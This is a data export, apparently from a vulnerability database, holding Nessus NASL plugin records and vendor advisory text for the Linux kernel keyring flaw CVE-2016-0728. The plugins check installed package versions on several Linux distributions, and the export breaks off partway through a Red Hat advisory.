Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88174);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. 
(CVE-2016-0728, Important)\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1601&L=scientific-linux-errata&F=&S=&P=11419\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3869eafb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a security fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with join_session_keyring() could lead to local attackers gain root privileges. 
(bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-0186-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0186-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88140);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n 
script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2016:0186-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to receive a\nsecurity fix.\n\nFollowing security bug was fixed :\n\n - A reference leak in keyring handling with\n join_session_keyring() could lead to local attackers\n gain root privileges. (bsc#962075, CVE-2016-0728).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0728/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160186-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b46e576\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Server 12-SP1 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-124=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-124=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch 
SUSE-SLE-Live-Patching-12-2016-124=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-124=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", 
reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.51-60.25.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.51-60.25.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:29", "description": "Yevgeny Pats discovered that the session keyring implementation in the Linux kernel did not properly reference count when joining an existing session keyring. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2871-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2871-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88013);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2871-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2871-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2871-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic-lpae\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-lowlatency\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:32", "description": "Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in a certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for reporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
